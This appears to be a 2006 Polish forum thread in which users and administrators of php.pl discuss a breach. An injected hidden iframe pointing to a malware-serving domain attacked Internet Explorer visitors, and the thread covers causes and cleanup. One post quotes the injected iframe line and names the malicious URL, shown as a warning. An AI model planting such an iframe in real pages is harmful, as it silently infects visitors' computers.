Włam na forum!?, Wczoraj... 22.00 :| ?????? Opcje

[Master Miko]

Co się wczoraj stało! Wchodzę na forum... (przez IE) patrzę, nagle pojawia się monit skryptu... i jakiś dziwny kod. Zacina się... firewall wybucha świszczy i promieniuje głęboką czerwienią...
wypluwając:

Kod

IP: 85.249.19.122
PORT: TCP
[362] MS WMF Code Exec Attempt Detected (CVE-2005-4560)

Wlazłem FIrefoxem... nic się nie pojawiło poza... Nie można połączyć się z domeną "http://2-extreme.biz/traff.php?adv=53" (BROŃ BOŻE NIE WCHODZIĆ TAM)

Zaintrygował mnie mały kwadracik na górze forum... był to iframe o treści:

[HTML] pobierz, plaintext 
<iframe src="http://2-extreme.biz/traff.php?adv=53" width=1 height=1></iframe>
[HTML] pobierz, plaintext 

Umieszczony dokładnie nad doctype.

Jak on się tam dostał?! Jak to się stało?! Jakim sposbem :|

Mam farta.. (i firewalla), bo naszczęście miałem dobre zabezpieczenia.. ale tak to mój komp byłby teraz... zainfekowany... to było dosyć niebezpieczne :/

[seaquest]

Wiemy, już zlikwidowaliśmy i zabezpieczyliśmy.

[Master Miko]

Cieszę się bardzo, że ekipa forum php jest bardzo szybka. Praktycznie 15 minut po zgłoszeniu wszystko było ok! Brawo.

Ale jednak pojawił się problem... który był dość niebezpieczny. Stałem się taki mniej pewny przez to wydarzenie... imo dziwne to było :|

[nospor]

Doskonale Cię rozumiem Master Miko. Postaramy się niedługo udzielic więcej informacji na ten temat, jak już tylko zbadamy dokladnie logi i bedziemy mieli pewność co i jak. Póki co nie chcemy na wyrost nic mówić, by potem nie bylo, ze cos źle mowimy lub wprowadzamy specjalnie w błąd.

ps: dziękuje z tego miejsca Tobie i innym osobom, za szybką reakcję, po zobaczeniu nieprawidłowości

[kosheen2k]

dokładnie miałem to samo, ale niestety mój Kerio Personal Firewall nie dał sobie rady... zdążylem też zauwazyć ten intrygujący kwadracik i nagle zwiecha komputera i restart...

[Zajec]

Dzwię się, że po takich akcjach ludzie jeszcze wracają do IE :-) Używajcie sobie na stałe Opery/Firefoksa, które są po prostu niepodatne na jakieś tam "wirusy" stronowe

[Master Miko]

Ten wirus został zaprojektowany specjalnie na internet explorer. Wchodziłem na strone zhackowaną przez Firefoxa pojawiało się strona niedostępna. Równie dobrze można było zrobić hacka na firefoxa lub operę....

a dlaczego tylko na IE? pewnie znacie odpowiedź...

[sf]

a dlaczego tylko na IE? pewnie znacie odpowiedź...

Bo kto nie jest z nami jest przeciwko nam. Wszyscy, którzy używaja IE pożałują!

[GrayHat]

heh php.pl chcialo zarobic co?? takie serwisy placa do 10€ za 1000 zainfekowanych kompow na webhelp jest dyskusja na ten temat

[DeyV]

Ooby które ucierpiały z powodu naszych problemów serdecznie przepraszamy.

Jest to jednak tylko jeszcze jeden przykład tego, że każdy komputer powinien być zaopatrzony w program antywirusowy - choćby w darmowego Avasta...

[NuLL]

Ja nie mam nic Ba - mam nawet zablokowany dostep do BIOSu w kompie.

Ktos sie orientuje czym to gowno mozna usunac Bo chcialbym chociaz czesc danych w miare mozliwosci.

[Slump]

NuLL moze i glupia propozycja a resetowales biosa??

Tak tylko pytam

[NuLL]

Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko

[strife]

Mam laptopa - nie wiem nawet jak to sie robi - bede musial pokombinowac. Bios to i tak pol biedy - moje dane - praca i wszystko

Współczuje Ci, ja jakiś miesiąc dwa też miałem awarię, jednak spowodowaną eksperymentami z linuxem, straciłem 40 GB muzyki, filmów, i co najważnejsze sporo cennych danych.

Szukałem trochę o trojanie jednak żadnych konkretnych informacji nie znalazłem, dziwi mnie to, że trojan ustawił Ci hasło na BIOS - jeszcze o takim przypadku nie słyszałem.

Teraz mogą Ci jedynie pomóc programy, które odzyskują sformatowane partycje, żadnego polecić nie mogę bo żaden mi nie działał tak jakbym chciał

Jak coś znajdę dam znać :]

Pozdrawiam

[NuLL]

Thx za troske

Osobiscie myslalem ze format bedzie - bo zamienilem dyski laptopowe i instaluje sobie obecnie nowego

Myslalem aby sie poratowac linuxem

Ale...

Zadzwonilem do pewnej osoby czyli administratora microsoftu i co mi powiedzial :

-> zainstal sobie uczelnianego 2k3 Server na NTFSie
-> podepnij dysk z laptopa na USB do kompa stacjonarnego
-> zabron programom z laptopowego dysku dostepu do pamieci i dysku z 2k3 Server
-> wywal ten folder, nastepny - tak chyba z 400 MB folderow systemowych windowsa oraz tych z 'Documents and Settings'
-> podepnij dysk

i sprawdz...

DZIALA

Co do trojanow BIOSowych - to mozliwe - podobnie jak z poziomu Windowsa jest mozliwa aktualizacja BIOSu

[Fo]

W związku z ostatnim włamaniem na php.pl i rozesłaniem e-maili z adresem do zainfekowanego pliku ekipa php.pl chce przeprosić za wszystkie problemy powstałe w ten sposób.

W wyniku ataku dodano też do kodu forum ramkę, która u użytkowników przeglądarki Internet Explorer spowodowała wejście na zainfekowaną stronę. Poza tym zamieniono też adresy w jednym z tematów na prowadzące do zainfekowanego pliku wykonalnego.

Musimy przyznać, że do włamania doszło ze względu na słabe hasło jednego z naszych administratorów. Dlatego też zachęcamy do zmiany hasła na mocne (co najmniej 8 znaków, duże i małe litery, cyfry, znaki specjalne). Hasła typu: dom, qwerty, login itp nie są bezpieczne.

Chcę podkreślić, że wszystkie hasła zostały wzmocnione, a na całą sieć, z której pochodził atak nałożony został ban. Zostały też wzmocnione zabezpieczenia serwera, a do skryptu forum dopisano modyfikację, która wymaga podania dodatkowego hasła w celu wysłania wiadomości do wszystkich użytkowników.

Jeszcze raz serdecznie przepraszamy.
...

wlasnie dostalem takiego maila z przeprosinami,
hmm jak najbardziej na miejscu - szczegolnie dla tych ktorzy sie nacieli,
ale czy naprawde panowie nie uwazacie ze do kwestii bezpieczenstwa powinno sie podejsc nieco inaczej niz ban na cala klase adresow z ktorych bylo/moglo byc polaczenie ?

[info] nie chce byc odebrany jako jakis natret, albo cus, ale mam wrazenie ze taka reakcja to raczej jeden sik z hydrantu w plonacy budynek... hmm, on dalej po chwili bedzie plonac [/info]

[Radarek]

A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...

[aleksander]

przyznac sie ktory to:D bedzie publiczne biczowanie:D

[strife]

A mnie osobiscie dziwi to 'słabe hasło jednego z naszych administratorów'. Nie wiem czy to jeden z uzytkownikow tego forum, ale jakies pojecie o haslach powiniem miec. Bez przesady...

A ja to zrozumiałem, że "słabe" w sensie, że nie wystarczyło bo jednak był włam. Każde zabezpieczenie wydające się nam najlepsze może się okazać za "słabe" jak ktoś je złamie. Tak to odebrałem:)

Przecież administrator to też człowiek ( chyba ).

[GrayHat]

bierzcie przyklad ze mnie 18 znakow: 6 cyfr, 6 liter malych i 6 liter wielkich

[Zajec]

Równie dobrze można było zrobić hacka na firefoxa lub operę....

Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.

Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.


[dodano]
http://security.blaut.biz/

Ten post edytował Zajec 7.05.2006, 18:51:26

[seaquest]

Fo: ban na całą klasę adresów, to jeszcze dodatkowe zabezpieczenie, ponieważ ataki nie pochodziły z Polski.

Poza tym zwiększyliśmy zabezpiecznia użytkowników uprzywilejowwanych i do kluczowych dla systemu funkcji dodaliśmy dodatkowe, niestandartowe zabezpieczenia.

Myślę, że zrobiliśmy wszystko, żeby taka sytuacja się nie powtórzyła.

[Seth]

GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP

[hwao]

GrayHat: 012345abcdefABCDEF - zgadlem ? :PPPP

Kto jak kto, ale jak na GrayHat to wielce prawdopodobne...
Ewentualnie obstawiam ze to hash md5 i pierwsze 6 znakow z duzej litery.

Co do biosow, to sa uniwersalne hasla.
Moral z tego taki, nie uzywac dziurawych systemow operacyjnych
Np mi sie nic nie stalo

[mario]

przeczytalem przed chwileczka mail'a nt. wlamu. Wszyscy mieli dostac jakas "masowke" zapraszajaca na zhakowane forum. Cale szczescie do mnie taki mail nie doszedl, a po drugie uzywam Opery :-)

IE jest do d.... Opera i Firefox RULEZZZZZ!!!!!!!!!

[spenalzo]

Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.

Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB

[angel2953]

Prosze o info jak ten syf usunąć z IPB - u mnie na forum pojawiło sie to samo. Dociekajac co to jest, spróbówałem odpalić tego linka przez IE - po czym zacząłem tego żąłować ._.

Tak czy siak, prosze o pomoc w usunieciu tego szajsu z IPB

skoro to już jest drugi tego typu atak (może jest ich więcej) to można by to zgłosić do autorów IPB, bo może to dziura w samym skryptcie...

[DeyV]

Spenalzo - czy wiecie, w jaki sposob ktoś zdobył hasla administracyjne?
Czy też spodziewasz się jakiejść dziury lub backdora ?


czy też mówisz o czymś jeszcze innym (bo nie do końca rozumiem) ?

[spenalzo]

Mówie o dokładnie tym samym
Co ciekawe - zauważyłem to dzisiaj rano (+ info od userów o wirusach, ja nie miałem), usunąłem. Po paru godzinach ten iframe pojawił sie znowu co mnie dosyć poważnie zaniepokoiło co do bezpieczeństwa forum...
W pierwszej chwili pomyśłałem, że ktoś złamał moje hasła np. do forum - jednak jak zobaczyłem ten temat tutaj to zaniepokoiłem sie troche bardziej, bo skoro przydarzyło sie to na dwóch forach mniej wiejcej w tym samym czasie to jest to coś bardziej poważnego niż złamane hasło :/

[Master Miko]

Równie dobrze można było zrobić hacka na firefoxa lub operę....

Wybacz, że zburzę Twój światopogląd... FIrefox nie ma żadnej krytycznej dziury, Opera w ogóle żadnej.

Co więcej, wszystkie dziury wykryte w tych przeglądarkach są bardzo szybko łatane i wypuszczane odpowiednie łatki. Firefox uaktualnia się automatycznie do najnowsze wersji, Opera wyświetla informacje o nowszej wersji i podaje linka, by ją ściągnąć.


[dodano]
http://security.blaut.biz/

ahahahahahah koleś tym postem mnie ZABIŁEŚ!!


////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy

Ten post edytował Master Miko 7.05.2006, 21:48:09

[DeyV]

spenalzo - jesli używasz ipb 1.3 to problem może być w czymś zupełnie innym. Używany przez nas skrypt nie ma ograniczenia na ilośc prób logowania.

Oznacza to, że ... jest bardzo podatny na brutal force.

Planujemy w najbliższym czasie przygotowac modyfikację pod tym kątem. A narazie pozostaje nam tylko mieć nadzieję, że to nie jest coś poważniejszego...

[Zajec]

ahahahahahah koleś tym postem mnie ZABIŁEŚ!!


////
a co do bezpieczeństwa ufam, że jeśli teraz super zabezpieczyliście swoje hasła to to się nie powtórzy

Nie ma to jak konkretna, uargumentowana odpowiedź :-) Brawo, zbiłeś wszystkie moje argumenty.

[spenalzo]

No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...

A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...

Ten post edytował spenalzo 7.05.2006, 23:21:00

[hwao]

Pewne ktos znalaz dziure na ipb i "sprzeda" oferte dodania "tego czegos" na kazdym ipb w wersji 1.3. Zapewne robi to poprostu automat puszczony w interncie (podobnie bylo z phpbb).

Trzeba zamienic wersje form na najnowsza jaka mamy i tyle... ba swoja droga suport 1.3 juz nie pomoze a jezeli ktos nie powie jak "to zrobil" (a watpie zeby to zrobil) to problem szybko nie zniknie.

[angel2953]

No ja spodziewam sie akurat, że to nie jest złamane hasło... po pierwsze jest ono dość długie, zawiera cyfry itd. No i najważniejsze - dlaczego ktoś, kto złamał hasłó dodałby tylko coś takiego, anie np. nagrzebał coś wiecej na forum? BO jak dla mnie złamanie hasła tylko po to, zeby dodać iframe to jest nielogiczne troche...

A poza tym, brute force na stronie WWW powinno wygenerować zwiekszony ruch - a, że na mojej stronie jest on generalnie dość niski, to w ostatnich dniach nie widze żadnych podejrzanych odchyleń od normy...

Masz racę: to nie jest złamane hasło i nikogo z ekipy php.plnie należy winić. To jest dziura w IPB 1.3... Własnie znalazłem 23 (a to tylko pierwsza strona na googlach a jest ich klikadziesiąt) fora oparte o IPB 1.3, które mają lub miały ten sam problem...

[MrMag]

wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.

[sztosz]

Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.

Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?

[angel2953]

wiem, ze to samobojstwo, ale jezeli macie dostep do logow apacha mozna by poszukac jakis podejrzanych zapytan z tego okresu. u mnie czesto roboty nawalaja serie dziwnych zapytan do nieistniejacych katalogow na chybil trafil.

Szczególnie bym obadał odwołania do login.php bo z tego co czytałem to tam chyba jest ta dziura z uzyskaniem praw admina...

@normanos: z tego co się orientuję to ten bład jest do wersji 2.0.4 a podobny w wersji 2.1.5...

Ten post edytował angel2953 8.05.2006, 14:16:06

[nrm]

IPB 1.3 to prehistoria. sporo dziur. od tej wersji minelo pare lat az do 2.1.x

swoja droga czemu nie kupicie licencji?

[Slump]

Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware

[angel2953]

Licecja jest od dawna, prace nad uruchomieniem forum podobnego do php vol 2 trwaja beware

Znaczy się bezie nowa wersja IPB czy zupełnie nowy skrypt forum (napisany przez ekipę php.pl ) ?

[DeyV]

IPB 2.1

Co do własnego - wystarczy że wielu z nas angażuje się / angażowal w OPB

[kwiateusz]

no wreszcie bo 1.3 troche archaiczny system D: SLump znajdujesz czas na upgrade przy pracy nad OPB

[seaquest]

Ale to nie on, tylko ja, NuLL i jeszcze pare innych osób, które robiło mody. Oczywiście Slump też między innymi.

[spenalzo]

Dzisiaj poprzeglądałem troche statsy z webalizera - i co sie okazało?
W maju było ~200 odwołan do admin.php - z czego moich jakieś 5

No i chyba mamy przyczyne.

Ten post edytował spenalzo 8.05.2006, 21:08:40

[kwiateusz]

nie wiem czy do 1.3 jest taki modzik ale do 2.1 jest ze mozna admin.php przeniesc do dowolnego pliku... tak kwestia zabezpieczen

[acztery]

forum na którym tyle o bezpieczenstwie a tu włam, to Ci ironia.

[GrayHat]

Przepraszam że się wtrącę, ale to całe przpraszanie ekipy forum za to że ktoś ma zainfekowanego kompa jest trochę bez sensu. To tak jakby burmistrz miasta przepraszał kogoś, że temu komuś ktośsię do chałupy włamał. A to że gość nIE zamknął dzwi na klucz nie ma znaczenia.

Panowie piszecie aplikacje w php które powinny być bezpieczne, a sami nie potraficie wlasnych komputerów zabezpieczyć?

nie zgodze sie z toba. obowiazkiem ekipy php.pl jest zabezpieczanie serwerow. to nie pierwszy wlam do php.pl kiedys podmieniono nawet strone... to tak jak by ktos uzyskal dostep do wszystkich kont pocztowych na onecie dzieki dziurze w webmailu... i co to wina programisty ktory go pisal czy zarzadu??

[hwao]

GrayHat czemu nie czytasz wszytkich tematow i sie wypowiadasz?

[sztosz]

@GrayHat: Ale co to że kompy zostały zainfekowane to wina użytkowników w tym przypadku. Co innego jak ktoś przegląda moją pocztę na serwerze (to jest niedopuszczalne), a co innego jak ktoś ma np. zdalny dostęp do mojego komputer w domu, bo go nie zabezpieczyłem choćby darmowym antywirusem i firewallem.

[hOMER]

witam
bardzo prosze o pomoc. jak sobie poradziliscie z tym wirusem
widze ze opanował on wiekszosc for na IPB

nasze forum tez padło
www.corrado.com.pl

na poczatku władowal sie przez IE i rozwalil kilka kompow. przeszlismy na foxa i bylo ok.
potem ewoluowal i doszedl skrypt takrze pod Foxa wiec kazalismy userom zainstalowac skrypt NoScript. Jednak dzien kolejny przyniusł kolejną ewolucje i tego juz nie przeszlismy. Zaczął ładować jakiegos .exe mimo ze skrypty byly blokowane.
Pozniej nasz admin stracil prawa admina i nie mamy juz admina na forum.

bardzo prosze o wszelkie wskazowki jak usunąć tą dziure

[seaquest]

Trzeba mieć dostęp do panelu administratora forum, żeby usunąć. Trzeba wejść w zarządzanie Skórami i szablonami, dalej: Forumowe Wrappery i edytuj. Na samej górze powinien być ten złośliwy kod. Trzeba go usunąć zapisać.

Proponuję też przeglądnąć logi samego IPB, czy nie zostały wysłane jakieś mass-maile. Poza tym proponuję przeszukać tematy pod kątem frazy "loadadv", mogą być dodane różne linki w tematach.

Jako zabezpieczenie proponujemy wprowadzenie sprawdzania ilości błędnie wpisanych haseł i blokada czasowa po powiedzmy 3 nieudanych próbach.

[nospor]

Trzeba mieć dostęp do panelu administratora forum

Pozniej nasz admin stracil prawa admina i nie mamy juz admina na forum.

i zonk
trzeba wiec w bazie (poprzez PMA) w tabeli "_ipb_templates" zedytowac rekord, badz tez w bazie ustawic prawa administratora na dane konto

[hOMER]

Jako zabezpieczenie proponujemy wprowadzenie sprawdzania ilości błędnie wpisanych haseł i blokada czasowa po powiedzmy 3 nieudanych próbach.

ok. mamy juz admina

a jak zmienic te logowania na 3 bo niemozemy tego znalesc?

[seaquest]

Trzeba ręcznie dopisać.

[hOMER]

jakaś wskazóweczka gdzie i co?

[kwiateusz]

trzeba wlasnego moda splodzic ktory bedzie dziala tak ajk wyzej opisano.. lub dac moda ktory przeniesie acp do innego pliku (o ile ejst do twojej wersji forum) ew. w .htacess ustawic zeby do panelu admina mieli dostep tylko osoby z odpowiednich ip ..

[LBO]

Właśnie dostałem owego maila z linkiem do zainfekowanego pliku.

Coś się spóźniliście :-) hehehe

[GrayHat]

tez wlasnie dostalem maila z tym linkiem

[onekamel]

Witam
powrocmy do tematu maila z przeprosinami i maila z linkiem do dziwnego pliku. Dlaczego maila z przeprosinami dostalem cos kolo 07.05.2006 a maila z linkiem do zainfekowanego pliku dopiero 13.05. Czy kolejnosc nadejscia maili nie powinna byc odwrotna?

[seaquest]

Powinna, ale część maili podochodziła później. Dlaczego? Ciężko powiedzieć.